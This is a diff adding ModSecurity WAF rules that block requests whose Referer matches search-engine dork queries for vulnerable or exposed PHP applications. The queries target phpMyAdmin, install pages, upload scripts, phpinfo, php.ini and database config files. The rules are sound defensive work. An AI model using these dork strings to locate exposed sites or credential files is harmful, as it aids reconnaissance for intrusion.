+SecRule REQUEST_HEADERS:Referer   "inurl:config\.php\.new \+vbulletin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371244,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/cricket/grapher\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371400,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "e107\.org 2002/2003 inurl:forum_post\.php\?nt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371559,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:nquser\.php filetype:php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371567,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "phpfreenews inurl:admin\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371568,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php\.exe filetype:exe -example\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:click\.php in(?:text|body):phpclicklog " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371583,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:plog/register\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371598,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php explorer ext:php inurl:(?:phpexplorer|list|browse)\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371600,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:php inurl:viewfile -index\.php -idfil" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371605,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by invision power file manager \(inurl:login\.php\) \| \(intitle:browsing directory / \) " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371632,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:src/login\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371671,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\+:8443/login\.php3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371679,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:please login - forums powered by ubb\.threads\)\|\(inurl:login\.php ubb\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371687,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:imp inurl:imp/index\.php3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321689,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:please login - forums powered by wwwthreads\)\|\(inurl:wwwthreads/login\.php\)\|\(inurl:wwwthreads/login\.pl\?cat=\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371694,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php121login\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371697,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:vsadmin/login \| inurl:vsadmin/admin inurl:\.php\|\.asp -response\.buffer = true -javascript" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371701,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/admin/configuration\. php\? mystore" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371704,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:textpattern/index\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321761,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*tiki-edit_submission\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: tiki-edit Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*edit_blog\.php.*filetype\:php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350007,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: edit_blog.php Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "enter ip.*inurl.*php-ping\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*install.*install\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350017,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*phpsysinfo.*created by phpsysinfo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "squirrelmail version 1\.4\.4.*inurl:src ext\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350020,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl:.*upload\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php inurl:hlstats in(?:text|body):server username" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:wordpress › setup configuration file.*inurl:setup-config\.php\?step=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:phporacleadmin/php -download -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321025,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:config\.php dbuname dbpass" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/xampp/security\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371242,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:phpinfo\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371243,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:configuration\.php-dist" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371245,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):viewcvs inurl:settings\.php " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371254,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:webstatistica inurl:main\.php\) \| \(intitle:webstatistica server\) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc\.com -edu -software -rob_2926 -crack\.ru -edeco\.cn" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371257,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wp-mail\.php \+there doesn't seem to be any new mail\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371258,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "-site:php\.net -the php group inurl:source inurl:url ext:php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371286,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:\.?php inurl:index inurl:phpicalendar -site:sourceforge\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371330,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):sqlitemanager inurl:main\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371343,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cacti \+inurl:graph_view\.php \+settings tree view -cvs -rpm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371399,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php\.ini filetype:ini" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371403,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:vbstats\.php page generated" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371431,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:main\.php welcome to phpmyadmin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371449,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:main\.php phpmyadmin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371450,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "phpmyadmin running on inurl:main\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371451,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:updown\.php \| in(?:text|body):powered by php uploader downloader " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371552,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "mail-it now! intitle:contact form \| inurl:contact\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371561,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by flexphpnews inurl:news \| inurl:press" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371565,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: simplicity of upload inurl:download\.php \| inurl:upload\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371566,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:page\.php\?intpageid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372258,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\?act=phpinfo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372272,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\?delete in(?:text|body):php version in(?:text|body):safe_mode" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372273,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:printable_pedigree\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372318,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php-stats\.js\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372367,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "100% \| 50% \| 25% back to gallery inurl:show\.php\?imageid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372379,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:pmwiki\.php \+page last modified on \| pmwikiphilosophy" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372417,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:printable_pedigree\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372420,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/webquest/soporte_derecha_w\.php\?" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372422,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:printable_pedigree\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372441,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:roschedule\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372455,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:article\.download\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372494,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):phpbb - auction inurl:auction" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372496,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:fclick\.php\?fid" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372499,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:xampp/biorhythm\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372514,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:show_memorial\.php\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372534,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by epay enterprise inurl:shop\.htm\?cid= \| nurl:shop\.php\?cid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372549,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:forum_answer\.php\?que_id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372554,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:offers_buy\.php\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372562,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mobpartner inurl:chat\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372566,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:offers_buy\.php\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372574,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:casting_view\.php\?adnum=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372581,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:fullview\.php\?tempid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372583,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cal_day\.php\?op=day&catview=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372586,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:clientsignup\.php classifieds" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372589,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:offers\.php\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372598,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:es_offer\.php\?files_dir=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372671,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:coursepage\.php\?id= in(?:text|body):web site design by : aim web design cheshire" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372677,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/phpplanner/userinfo\.php\?userid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372686,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:links\.php\?t=search" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372692,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cont_form\.php\?cf_id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372693,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer  "phpfreenews inurl\:admin\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHPFreeNews Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:.*install\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371888,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:\.?php inurl:ipinfo\.php distributed intrusion detection system" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371939,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:portscan\.php from port\|port range" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371947,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/adm-cfgedit\.php " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371948,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:\.?php inurl:nqt in(?:text|body):network query tool " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371953,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:phpsysinfo/ created by phpsysinfo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371970,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/vb/install/(?:install|upgrade)\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371975,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "there are no administrators accounts inurl:admin\.php -mysql_fetch_row" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371997,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:\.?php inurl:vauthenticate" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
